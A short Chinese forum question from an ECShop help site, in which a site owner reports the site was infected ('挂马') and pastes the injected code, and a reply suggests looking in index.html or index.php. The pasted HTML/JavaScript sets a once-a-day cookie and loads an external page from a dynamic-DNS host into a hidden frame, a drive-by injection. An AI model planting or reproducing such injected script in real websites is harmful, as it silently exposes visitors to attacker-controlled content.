网站被挂马

2016-07-07 15:28 来源:www.chinab4c.com 作者:ecshop专家

<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://xiaoxiao10629.3322.org/admin3/xin.html";}
}
</script>
<frameset rows="100%,*">
<frame name="hello" src="/category.php?id=3&updatedata=index">
<frame name="hi" src="">
</frameset>
</html>


我现在找不到这个文件在那里?哪位大侠知道啊!

回答:
你应该贴出你的网址来这样也看不出来的

一般会在index.html
或是index.php
可以仔细找下